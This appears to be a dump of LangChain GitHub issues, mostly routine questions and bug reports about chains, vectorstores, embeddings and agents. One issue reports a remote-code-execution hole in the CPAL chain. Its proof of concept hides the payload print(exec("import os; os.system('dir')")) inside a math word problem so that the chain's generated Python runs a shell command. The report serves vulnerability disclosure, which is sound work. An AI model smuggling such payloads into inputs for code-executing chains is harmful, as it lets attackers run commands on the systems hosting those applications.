issue_owner_repo | issue_body | issue_title | issue_comments_url | issue_comments_count | issue_created_at | issue_updated_at | issue_html_url | issue_github_id | issue_number |
---|---|---|---|---|---|---|---|---|---|
[
"hwchase17",
"langchain"
]
| I am using router chaining to route my input. For the destination chains, I have four LLMChains and one ConversationalRetrievalChain. To combine these, I am using MultiPromptChain, but it isn't working.
Below are the functions that generate the router chain and the destination chains.
Any suggestions?
```python
def generate_destination_chains():
    """
    Creates a list of LLM chains with different prompt templates.
    """
    prompt_factory = PromptFactory()
    destination_chains = {}
    for p_info in prompt_factory.prompt_infos:
        name = p_info['name']
        prompt_template = p_info['prompt_template']
        if name == 'insurance sales expert':
            # Declaration of chain one
            chain = ConversationalRetrievalChain.from_llm(
                llm=llm,
                retriever=vectorstore.as_retriever(search_kwargs={"k": 6}),
                # memory=memory,
                chain_type="stuff",
                return_source_documents=True,
                verbose=False,
                # return_generated_question=True,
                # get_chat_history=lambda h: h,
                # max_tokens_limit=4000,
                # combine_docs_chain_kwargs={"prompt": prompt_template},
            )
        else:
            chain = LLMChain(llm=llm,
                             prompt=PromptTemplate(template=prompt_template,  # memory=memory,
                                                   input_variables=['input']))
        destination_chains[name] = chain
    default_chain = ConversationChain(llm=llm, output_key="text")
    return prompt_factory.prompt_infos, destination_chains, default_chain


def generate_router_chain(prompt_infos, destination_chains, default_chain):
    """
    Generates the router chain from the prompt infos.

    :param prompt_infos: The prompt information generated above.
    :param destination_chains: The LLM chains with different prompt templates.
    :param default_chain: A default chain.
    """
    destinations = [f"{p['name']}: {p['description']}" for p in prompt_infos]
    destinations_str = '\n'.join(destinations)
    router_template = MULTI_PROMPT_ROUTER_TEMPLATE.format(destinations=destinations_str)
    router_prompt = PromptTemplate(
        template=router_template,
        input_variables=['input'],
        output_parser=RouterOutputParser(),
    )
    router_chain = LLMRouterChain.from_llm(llm, router_prompt)
    return MultiPromptChain(
        router_chain=router_chain,
        destination_chains=destination_chains,
        default_chain=default_chain,
        verbose=True,
        # callbacks=[file_ballback_handler],
    )
```
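A possible reason this fails (an assumption, not a confirmed diagnosis): MultiPromptChain validates that every destination chain is an LLMChain, and ConversationalRetrievalChain also expects `question`/`chat_history` inputs rather than the router's `input`. A rough sketch of a workaround using the more general MultiRouteChain plus a thin adapter; the `RetrievalAdapterChain` name and key mapping are hypothetical:
```python
from typing import Dict, List

from langchain.chains.base import Chain
from langchain.chains.router.base import MultiRouteChain


class RetrievalAdapterChain(Chain):
    """Maps the router's "input"/"text" keys onto ConversationalRetrievalChain's keys."""

    target: Chain  # the ConversationalRetrievalChain built above

    @property
    def input_keys(self) -> List[str]:
        return ["input"]

    @property
    def output_keys(self) -> List[str]:
        return ["text"]

    def _call(self, inputs: Dict[str, str], run_manager=None) -> Dict[str, str]:
        result = self.target({"question": inputs["input"], "chat_history": []})
        return {"text": result["answer"]}


# chain = MultiRouteChain(
#     router_chain=router_chain,
#     destination_chains={**llm_chains,
#                         "insurance sales expert": RetrievalAdapterChain(target=retrieval_chain)},
#     default_chain=default_chain,
#     verbose=True,
# )
```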
### Suggestion:
_No response_ | Can't use ConversationalRetrievalChain with router chaining | https://api.github.com/repos/langchain-ai/langchain/issues/7644/comments | 4 | 2023-07-13T08:54:29Z | 2023-10-21T16:07:00Z | https://github.com/langchain-ai/langchain/issues/7644 | 1,802,530,745 | 7,644 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
How do I use contextual compression in a ConversationalRetrievalChain?
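A minimal sketch, assuming you already have an `llm` and a `vectorstore`; a ContextualCompressionRetriever is itself a retriever, so it can be passed straight to the chain:
```python
from langchain.chains import ConversationalRetrievalChain
from langchain.retrievers import ContextualCompressionRetriever
from langchain.retrievers.document_compressors import LLMChainExtractor

# Compress retrieved docs with an LLM-based extractor before they reach the chain.
compressor = LLMChainExtractor.from_llm(llm)
compression_retriever = ContextualCompressionRetriever(
    base_compressor=compressor,
    base_retriever=vectorstore.as_retriever(),
)
qa = ConversationalRetrievalChain.from_llm(llm=llm, retriever=compression_retriever)
result = qa({"question": "your question here", "chat_history": []})
```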
### Suggestion:
_No response_ | how to use contextual compression in a ConversationalRetrievalChain | https://api.github.com/repos/langchain-ai/langchain/issues/7642/comments | 1 | 2023-07-13T07:44:03Z | 2023-07-13T07:50:51Z | https://github.com/langchain-ai/langchain/issues/7642 | 1,802,406,179 | 7,642 |
[
"hwchase17",
"langchain"
]
| ### System Info
LangChain 0.0.231, Windows 10, Python 3.10.11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Run the following code:
```python
from langchain.experimental.cpal.base import CPALChain
from langchain import OpenAI

llm = OpenAI(temperature=0, max_tokens=512)
cpal_chain = CPALChain.from_univariate_prompt(llm=llm, verbose=True)
question = (
    "Jan has three times the number of pets as Marcia. "
    "Marcia has print(exec(\"import os; os.system('dir')\")) more pets than Cindy. "
    "If Cindy has 4 pets, how many total pets do the three have?"
)
cpal_chain.run(question)
```
### Expected behavior
Expected to have some kind of validation to mitigate the possibility of unbound Python execution, command execution, etc. | RCE vulnerability in CPAL (causal program-aided language) chain | https://api.github.com/repos/langchain-ai/langchain/issues/7641/comments | 1 | 2023-07-13T07:26:31Z | 2023-08-29T18:44:50Z | https://github.com/langchain-ai/langchain/issues/7641 | 1,802,378,837 | 7,641 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
I am using LLMChainFilter and ContextualCompressionRetriever to compress my context, like this:
```python
llm = AzureChatOpenAI(deployment_name="gpt-35-turbo", model_name="gpt-35-turbo",
                      temperature=0, max_tokens=500)
compressor = LLMChainFilter.from_llm(llm)
compression_retriever = ContextualCompressionRetriever(
    base_compressor=compressor,
    base_retriever=chroma.as_retriever(search_kwargs=search_kwargs),
)
```
I noticed that if LLMChainFilter returns no docs, the ContextualCompressionRetriever returns an empty result too. Can ContextualCompressionRetriever fall back to the base retriever's docs when LLMChainFilter returns nothing?
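As far as I can tell this fallback is not built in; a minimal user-side sketch:
```python
# Sketch: query the compression retriever first, and fall back to the base
# retriever when the LLMChainFilter has rejected every candidate document.
def retrieve_with_fallback(query: str):
    docs = compression_retriever.get_relevant_documents(query)
    if not docs:
        docs = compression_retriever.base_retriever.get_relevant_documents(query)
    return docs
```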
### Suggestion:
_No response_ | can LLMChainFilter support default retriever | https://api.github.com/repos/langchain-ai/langchain/issues/7640/comments | 1 | 2023-07-13T07:06:22Z | 2023-10-19T16:05:40Z | https://github.com/langchain-ai/langchain/issues/7640 | 1,802,349,041 | 7,640 |
[
"hwchase17",
"langchain"
]
| ### System Info
Langchain 0.0.231 on mac, python 3.11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Follow the basic example* in the Chroma docs, that goes something like:
```
client = chromadb.Client(Settings(...))
db = Chroma(client=client, collection_name="my_collection")
```
However, this throws an error:
```
File "/Users/dondo/Library/Caches/pypoetry/virtualenvs/app-IE1VmXUs-py3.11/lib/python3.11/site-packages/langchain/vectorstores/chroma.py", line 105, in __init__
self._client_settings.persist_directory or persist_directory
^^^^^^^^^^^^^^^^^^^^^
AttributeError: 'Chroma' object has no attribute '_client_settings'
```
Looking at the line in question\*\*, this seems like a bug: when you pass in `client`, `self._client_settings` is not set, but is referenced.
\* example: <https://python.langchain.com/docs/modules/data_connection/vectorstores/integrations/chroma.html#basic-example-using-the-docker-container>
\*\* code: <https://github.com/hwchase17/langchain/blob/5171c3bccaf8642135a20e558eb8468ccbfcc682/langchain/vectorstores/chroma.py#L105>
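Until this is patched, one possible workaround (a sketch; the `Settings` kwargs shown are the REST example values from the docs) is to pass `client_settings` instead of a pre-built `client`, which takes the code path that does set `self._client_settings`:
```python
# Hypothetical workaround: let Chroma build the client itself from settings.
settings = Settings(chroma_api_impl="rest",
                    chroma_server_host="localhost",
                    chroma_server_http_port="8000")
db = Chroma(collection_name="my_collection", client_settings=settings)
```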
### Expected behavior
According to the docs, creating a Chroma instance from a chromadb client should be supported. | Chroma db w/client: AttributeError: 'Chroma' object has no attribute '_client_settings' | https://api.github.com/repos/langchain-ai/langchain/issues/7638/comments | 2 | 2023-07-13T06:06:50Z | 2023-07-13T13:28:58Z | https://github.com/langchain-ai/langchain/issues/7638 | 1,802,251,081 | 7,638 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain 0.0.230
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```python
class SemanticSearch():
    """Class containing modules for the semantic search."""

    model_name: str
    model: HuggingFaceEmbeddings

    def __init__(self,
                 model_name: str = "sentence-transformers/distiluse-base-multilingual-cased-v2",
                 **kwargs
                 ) -> None:
        self.model_name = model_name
        self.model = HuggingFaceEmbeddings(model_name=self.model_name, **kwargs)

    def vectorize_doc(self, doc: Path, vectordb_dir: Path) -> None:
        """Transform a doc containing all the information into a VectorDB.

        Args:
            doc (Path): File path containing the information. doc is a .txt file with \n\n\n separators.
            vectordb_dir (Path, optional): Directory for the VectorDB. Defaults to config.VECTORDB_PATH.
        """
        if os.path.exists(doc):
            with open(doc, "r") as f:
                text = f.read()
            texts = text.split("\n\n\n")
            LOGGER.info(f'Number of chunks: {len(texts)}')
            Chroma.from_texts(texts=texts,
                              embedding=self.model,
                              persist_directory=str(vectordb_dir))  # needs to be a string
            LOGGER.info(f"VectorDB correctly created at {vectordb_dir}")
        else:
            raise FileNotFoundError(f"{doc} does not exist.")

    def search(self, query: str, vectordb_dir: str = config.get('config', 'VECTORDB_PATH'),
               k: int = 1) -> List[Tuple[Document, float]]:
        """From a query, find the corresponding elements based on personal information stored in the vectordb.

        Euclidean distance is used to find the closest vectors.

        Args:
            query (str): Question asked by the user.
            vectordb_dir (str, optional): Path to the vectordb. Defaults to config.VECTORDB_DIR.

        Returns:
            List[Tuple[Document, float]]: Elements corresponding to the query based on semantic search,
                associated with their respective scores.
        """
        timestamp = time.time()
        vectordb = Chroma(persist_directory=vectordb_dir, embedding_function=self.model)
        results = vectordb.similarity_search_with_score(query=query, k=k)
        LOGGER.info(f"It took {time.time() - timestamp} to search elements with semantic search.")
        return results
```
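For what it's worth, this error usually means the persisted Chroma directory was first populated with a different, 768-dimensional embedding model, while distiluse-base-multilingual-cased-v2 produces 512-dimensional vectors. A quick check (illustrative):
```python
# Sanity check: print the current model's embedding dimension. If it differs
# from the index's (768 here), recreate the vectordb in a fresh persist_directory.
dim = len(HuggingFaceEmbeddings(
    model_name="sentence-transformers/distiluse-base-multilingual-cased-v2"
).embed_query("test"))
print(dim)  # 512
```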
### Expected behavior
no error | chromadb.errors.InvalidDimensionException: Dimensionality of (512) does not match index dimensionality (768) | https://api.github.com/repos/langchain-ai/langchain/issues/7634/comments | 4 | 2023-07-13T03:47:13Z | 2024-03-13T19:57:14Z | https://github.com/langchain-ai/langchain/issues/7634 | 1,802,101,252 | 7,634 |
[
"hwchase17",
"langchain"
]
| ### System Info
Langchain 0.0.231 on mac, python 3.11
### Who can help?
@jeffchub
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
tl;dr: Chroma no longer supports `{}` metadata, which breaks `.add_texts()`: https://github.com/chroma-core/chroma/issues/791#issuecomment-1630909852
I have written this code to try using a Chroma db for memory in a ConversationChain (based on this example: <https://python.langchain.com/docs/modules/memory/how_to/vectorstore_retriever_memory>):
```python
db = Chroma(persist_directory=local_dir_path, embedding_function=OpenAIEmbeddings())
retriever = db.as_retriever(search_kwargs=dict(k=1))
memory = VectorStoreRetrieverMemory(retriever=retriever)
llm_chain = ConversationChain(
    llm=OpenAIModel(**open_ai_params),
    prompt=prompt,
    memory=memory,
    verbose=True,
)
chain = SimpleSequentialChain(chains=[moderation_chain, llm_chain])
chain.run(input="hello")
```
However, I get an error `ValueError: Expected metadata to be a non-empty dict, got {}`
I see `langchain/vectorstores/base.py` in the stack trace, and add logging:
```python
def add_documents(self, documents: List[Document], **kwargs: Any) -> List[str]:
    """Run more documents through the embeddings and add to the vectorstore.

    Args:
        documents (List[Document]): Documents to add to the vectorstore.

    Returns:
        List[str]: List of IDs of the added texts.
    """
    # TODO: Handle the case where the user doesn't provide ids on the Collection
    texts = [doc.page_content for doc in documents]
    metadatas = [doc.metadata for doc in documents]
    print(f"texts: {texts}")
    print(f"metadata: {metadatas}")
    print(f"kwargs: {kwargs}")
    return self.add_texts(texts, metadatas, **kwargs)
```
which logs out
```
texts: ['input: test\nresponse: Hello! How can I assist you today?']
metadata: [{}]
kwargs: {}
```
If I edit the source code to pass `None`, then `self.add_texts` works as expected.
```python
metadatas = [doc.metadata for doc in documents]
if all(not metadata for metadata in metadatas):  # check if all items in the list are empty
    metadatas = None
```
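A possible user-side workaround until this is fixed (a sketch; it assumes `VectorStoreRetrieverMemory` exposes a `_form_documents` hook in this version) is to subclass the memory and attach a non-empty metadata dict:
```python
class ChromaSafeMemory(VectorStoreRetrieverMemory):
    def _form_documents(self, inputs, outputs):
        docs = super()._form_documents(inputs, outputs)
        for doc in docs:
            if not doc.metadata:
                doc.metadata = {"source": "conversation"}  # any non-empty dict works
        return docs
```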
### Expected behavior
No error should be thrown and `self.add_texts` should work correctly when calling `chain.run(input="hello")`. | Chroma db throws `ValueError: Expected metadata to be a non-empty dict, got {}` as ConversationChain memory | https://api.github.com/repos/langchain-ai/langchain/issues/7633/comments | 10 | 2023-07-13T03:42:31Z | 2023-12-15T10:19:21Z | https://github.com/langchain-ai/langchain/issues/7633 | 1,802,097,263 | 7,633 |
[
"hwchase17",
"langchain"
]
| ### Feature request
import os
from langchain.embeddings import HuggingFaceEmbeddings
EMBEDDING_MODEL = os.getenv("EMBEDDING_MODEL")
model_kwargs = {"device": "cpu"}
encode_kwargs = {"normalize_embeddings": False}
embeddings = HuggingFaceEmbeddings(
model_name=EMBEDDING_MODEL, model_kwargs=model_kwargs, encode_kwargs=encode_kwargs
)
Now I want to get the dimension from embeddings like SentenceTransformer.
from sentence_transformers import SentenceTransformer
device = "cpu"
model = SentenceTransformer(EMBEDDING_MODEL, device=device)
dimension = model.get_sentence_embedding_dimension()
### Motivation
Wrapper method of SentenceTransformer (get_sentence_embedding_dimension())
### Your contribution
no yet | Dimension from embeddings | https://api.github.com/repos/langchain-ai/langchain/issues/7632/comments | 1 | 2023-07-13T03:40:59Z | 2023-10-19T16:05:43Z | https://github.com/langchain-ai/langchain/issues/7632 | 1,802,096,176 | 7,632 |
[
"hwchase17",
"langchain"
]
| ### System Info
LangChain version : 0.0.216
Python version : 3.11.4
System: Windows
### Who can help?
@hwchase17 @eyu
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [X] Document Loaders
- [ ] Vector Stores / Retrievers
- [X] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
I want to create a chatbot to retrieve information from my own CSV file in response to a query using the Google PaLM model.
I want to improve the model's ability to perform specific data-retrieval requests from the CSV. Here are a few examples of queries I would like the chatbot to handle:
a. Calculate the average of a specific column in the CSV file.
b. Return the top 10 scores based on a grades column as a dataframe (the LLM output should be in JSON format).
c. Track the evolution of a product over time by analyzing a date column.
I have 2 questions:
1. What should I change in the following code to maintain contextual memory during the conversation (as the question changes)? (A sketch follows the code below.)
```python
from langchain.agents import create_pandas_dataframe_agent
from langchain.llms import VertexAI

ChatModel = VertexAI(
    model_name="text-bison@001",
    max_output_tokens=1024,
    temperature=0.1,
    top_p=0.8,
    top_k=40,
    verbose=True,
)
pd_agent = create_pandas_dataframe_agent(ChatModel,
                                         df,
                                         verbose=True,
                                         max_iterations=6)
# prompt = ...
# question = ...
response = pd_agent.run(prompt + question)
```
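For question 1, a hedged sketch (it assumes this LangChain version forwards `agent_executor_kwargs` to the underlying AgentExecutor; the default pandas prompt may also need a `chat_history` variable for the memory to actually be used):
```python
from langchain.memory import ConversationBufferMemory

memory = ConversationBufferMemory(memory_key="chat_history")
pd_agent = create_pandas_dataframe_agent(ChatModel,
                                         df,
                                         verbose=True,
                                         max_iterations=6,
                                         agent_executor_kwargs={"memory": memory})
response = pd_agent.run(prompt + question)  # follow-ups can now refer to earlier turns
```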
2. I'm looking for efficient ways to handle different types of tasks in my chatbot. Some questions require DataFrame responses, others need text responses, and some require both. Can I create specialized agents to handle specific tasks separately instead of specifying everything in one prompt?
### Expected behavior
1. A chatbot that maintains contextual memory during the conversation using create_pandas_dataframe_agent.
2. A suggestion for separating tasks across specialized agents to optimize the chain's output. | How to enable the memory mechanism when using create_pandas_dataframe_agent? | https://api.github.com/repos/langchain-ai/langchain/issues/7625/comments | 3 | 2023-07-12T22:49:20Z | 2023-10-19T16:05:48Z | https://github.com/langchain-ai/langchain/issues/7625 | 1,801,867,603 | 7,625 |
[
"hwchase17",
"langchain"
]
| ### System Info
Hi, my data has 10 rows and I tried both the pandas and CSV agents. In the observations I can see the agents are able to process all rows, but in the final answer both agents only output the first 5 rows from df.head(). I tried setting 'number_of_head_rows' to 10, but it doesn't work. Is there any way to make the agents show results from all rows rather than just the head?
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```python
from langchain.chat_models import AzureChatOpenAI
from langchain.agents import create_pandas_dataframe_agent
from langchain.agents.agent_types import AgentType

pd_agent = create_pandas_dataframe_agent(
    AzureChatOpenAI(
        deployment_name="gpt-4",
        model_kwargs={
            "api_key": openai.api_key,
            "api_base": openai.api_base,
            "api_type": openai.api_type,
            "api_version": openai.api_version,
        },
        temperature=0.0,
    ),
    df,
    agent=AgentType.CHAT_ZERO_SHOT_REACT_DESCRIPTION,
    verbose=True,
    handle_parsing_errors=True,
)
```
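A hedged note: `number_of_head_rows` only controls how many rows are pasted into the prompt as a preview; the final answer is free-form LLM text, so explicitly asking for every row sometimes helps (the phrasing below is illustrative):
```python
# Illustrative prompt nudge, not a guaranteed fix.
pd_agent.run("Compute the result for all 10 rows and list every row in your "
             "final answer, not just the first 5.")
```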
### Expected behavior
The agent should output results computed over the whole table, not just the first five rows shown by df.head(). | Pandas / CSV agent only show partial results from dataframe head | https://api.github.com/repos/langchain-ai/langchain/issues/7623/comments | 5 | 2023-07-12T22:44:43Z | 2023-10-12T21:14:42Z | https://github.com/langchain-ai/langchain/issues/7623 | 1,801,862,154 | 7,623 |
[
"hwchase17",
"langchain"
]
| ### System Info
LangChain version : 0.0.216
Python version : 3.11.4
System: Windows
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [X] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
I want to create a chatbot to retrieve information from my own PDF in response to a query using the Google PaLM model. I followed these steps:
- load the PDF
- split it using RecursiveCharacterTextSplitter
- store its embeddings in a Chroma vectorstore
- and then create a chain ...
```python
from langchain.document_loaders import PyPDFLoader
from langchain.text_splitter import RecursiveCharacterTextSplitter
from langchain.vectorstores import Chroma
from langchain.embeddings.openai import OpenAIEmbeddings
import langchain

loader = PyPDFLoader("path/to/pdf.pdf")
chroma_dir = "./chroma"
pages = loader.load()
splitter = RecursiveCharacterTextSplitter(
    chunk_size=1000,
    chunk_overlap=150,
    separators=['\n\n', '\n', " ", ""]
)
splits = splitter.split_documents(pages)
# I want to change this with another embedding method which doesn't require API authentication
embeddings = OpenAIEmbeddings()
vector_db = Chroma.from_documents(
    documents=splits,
    embedding=embeddings,
    persist_directory=chroma_dir
)
```
But the embedding method used throughout the LangChain documentation examples is OpenAIEmbeddings; how can we do this without it?
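LangChain does ship non-OpenAI embeddings; for example, `HuggingFaceEmbeddings` runs a sentence-transformers model locally without any API key. A minimal sketch (the model name is one common choice):
```python
from langchain.embeddings import HuggingFaceEmbeddings  # pip install sentence_transformers

embeddings = HuggingFaceEmbeddings(model_name="sentence-transformers/all-MiniLM-L6-v2")
vector_db = Chroma.from_documents(
    documents=splits,
    embedding=embeddings,
    persist_directory=chroma_dir,
)
```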
### Expected behavior
All the splits' embeddings stored in a Chroma vectorstore without using OpenAIEmbeddings(). | Is it possible to use open source embedding methods rather than OpenAIEmbeddings? | https://api.github.com/repos/langchain-ai/langchain/issues/7619/comments | 2 | 2023-07-12T21:32:46Z | 2024-04-26T12:42:21Z | https://github.com/langchain-ai/langchain/issues/7619 | 1,801,791,302 | 7,619 |
[
"hwchase17",
"langchain"
]
| ### System Info
I am using Windows 11 as OS, RAM = 44GB. Also, I am using LLaMa vicuna-7b-1.1.ggmlv3.q4_0.bin as Local LLM.
I am using Python 3.11.3 in venv virtual environment in VS code IDE and Langchain version 0.0.221.
<img width="948" alt="Screenshot 2023-07-13_Pydantic Error" src="https://github.com/hwchase17/langchain/assets/88419852/6f172fcd-5a06-472f-b3bb-aec069f626f0">
### Who can help?
@hwchase17
@agola11
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Use the following code:
```python
from llama_cpp import Llama
from langchain import PromptTemplate
from langchain.chains import LLMChain
from langchain.chat_models import ChatOpenAI
import os
from dotenv import load_dotenv
import json
import time

load_dotenv()
model_path = os.environ.get('MODEL_PATH')
print(model_path)

# Load the model
print("....Loading LLAMA")
llm = Llama(model_path=model_path, n_ctx=2048, n_threads=8)
# llm = ChatOpenAI(
#     temperature=0, model_name="gpt-3.5-turbo"
# )

text = "A lion lives in a jungle"
template = """/
Given the text data {text}, I want you to:
extract all possible semantic triples in the format of (subject, predicate, object)"""
triple_template = PromptTemplate(input_variables=["text"], template=template)
# print(triple_template)
# triple_template.format(text=t)
chain = LLMChain(llm=llm, prompt=triple_template)

# Run the model
print("Running Model.....")
print(chain.run(text=text))
```
I have commented out the llm created with ChatOpenAI; this code executes and gives the desired results if we use the OpenAI LLM. However, with LLaMa vicuna-7b-1.1.ggmlv3.q4_0.bin, the chain gives the following error:
```
File "pydantic\main.py", line 341, in pydantic.main.BaseModel.__init__
pydantic.error_wrappers.ValidationError: 1 validation error for LLMChain
llm
value is not a valid dict (type=type_error.dict)
```
I have tested the LLaMa LLM; it works outside the LLMChain without any problem.
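A likely cause (an assumption based on the error): LLMChain validates that `llm` is a LangChain LLM wrapper, and a raw `llama_cpp.Llama` object fails that check. LangChain's own `LlamaCpp` wrapper accepts the same model path:
```python
from langchain.llms import LlamaCpp

llm = LlamaCpp(model_path=model_path, n_ctx=2048, n_threads=8)
chain = LLMChain(llm=llm, prompt=triple_template)  # now passes pydantic validation
```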
### Expected behavior
In response to the given text, it should have returned a semantic triple of the form (Subject, Predicate, Object), i.e. (Lion, Lives in, Jungle) or something similar. | Issue with Langchain LLM Chains | https://api.github.com/repos/langchain-ai/langchain/issues/7618/comments | 4 | 2023-07-12T21:18:33Z | 2023-10-21T16:07:05Z | https://github.com/langchain-ai/langchain/issues/7618 | 1,801,774,854 | 7,618 |
[
"hwchase17",
"langchain"
]
| ### System Info
LangChain : v0.0.231
### Who can help?
@hwchase17
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
# Issue
`convert_to_openai_function` does not work as intended:
- Classes are not supported
- Any function without its source is not supported
# Reproduce
```python
from dataclasses import dataclass

from langchain.chains.openai_functions.base import (
    convert_to_openai_function,
)


@dataclass
class System:
    name: str
    ram: int


convert_to_openai_function(System)
```
### Expected behavior
When calling `langchain.chains.openai_functions.base.convert_to_openai_function`, the subsequent call to `_get_python_function_name` fails because it tries to read source code (and cannot find it).
Something much simpler would be to access the `__name__` attribute of the callable.
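A sketch of that suggested fix (a hypothetical patch, not the current implementation):
```python
def _get_python_function_name(function) -> str:
    """Use the callable's __name__ instead of parsing its source code."""
    return function.__name__
```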
| _get_python_function_name does not work with classes | https://api.github.com/repos/langchain-ai/langchain/issues/7616/comments | 4 | 2023-07-12T21:03:09Z | 2023-10-19T16:05:58Z | https://github.com/langchain-ai/langchain/issues/7616 | 1,801,757,859 | 7,616 |
[
"hwchase17",
"langchain"
]
| ### System Info
It's unclear how to check your LangChain version, so I will instead detail the steps I have taken.
I am running Python 3.10.6 and Python 3.11.4.
I have uninstalled and reinstalled both versions individually, on PATH, and attempted to install and run LangChain with just one of those two versions installed.
In both instances I ran 'pip install langchain', uninstalled and reinstalled as 'langchain[all]', and ran 'pip install --upgrade langchain[all]'.
I am running this in a Streamlit environment with the latest version installed by pip.
The line I am having an issue with is:
from langchain.agents import AgentType, initialize_agent, load_tools
which is from the published LangChain documentation.
### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```python
from langchain import OpenAI
from langchain.agents import AgentType, initialize_agent, load_tools
from langchain import StreamlitCallbackHandler
import streamlit as st
from dotenv import load_dotenv
```
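A hedged diagnostic (shadowing by a local `langchain.py`, or a stale install, is a common cause of this ImportError, though not confirmed here); this also answers how to check the installed version:
```python
import langchain

print(langchain.__version__)  # how to check your LangChain version
print(langchain.__file__)     # if this points at a local langchain.py, rename that file
```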
### Expected behavior
I expect it to import AgentType from langchain.agents as specified in the public documentation. | ImportError: cannot import name 'AgentType' from 'langchain.agents' | https://api.github.com/repos/langchain-ai/langchain/issues/7613/comments | 6 | 2023-07-12T20:17:05Z | 2024-02-15T16:11:10Z | https://github.com/langchain-ai/langchain/issues/7613 | 1,801,689,378 | 7,613 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
Hi, LangChain community,
just to share that even with the examples mentioned in the official documentation, it is almost impossible to get consistent results when using agents with Wikipedia/Google search tools. Or the search is non conclusive or the LLM is totally hallucinating at the very early step of the pipeline. LLMs from OpenAI for Completion or Conversation.
Did someone else notice this new behavior?
Best regards
Jerome
### Suggestion:
_No response_ | Issue: Big issue with inefficient search from Google/Wikipedia and LLM hallucinations with ReAct agent | https://api.github.com/repos/langchain-ai/langchain/issues/7610/comments | 1 | 2023-07-12T20:00:50Z | 2023-10-18T16:05:33Z | https://github.com/langchain-ai/langchain/issues/7610 | 1,801,664,816 | 7,610 |
[
"hwchase17",
"langchain"
]
| ### System Info
Repro:
Running this code sample.
https://github.com/techleadhd/chatgpt-retrieval
```
Traceback (most recent call last):
File "/home/maciej/workdir/intenzia/langchaintest/chatgpt-retrieval/chatgpt.py", line 5, in <module>
from langchain.chains import ConversationalRetrievalChain, RetrievalQA
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/langchain/__init__.py", line 6, in <module>
from langchain.agents import MRKLChain, ReActChain, SelfAskWithSearchChain
File "/home/maciej/.pyenv/versions/3.11.0/lib/python3.11/site-packages/langchain/agents/__init__.py", line 2, in <module>
from langchain.agents.agent import (
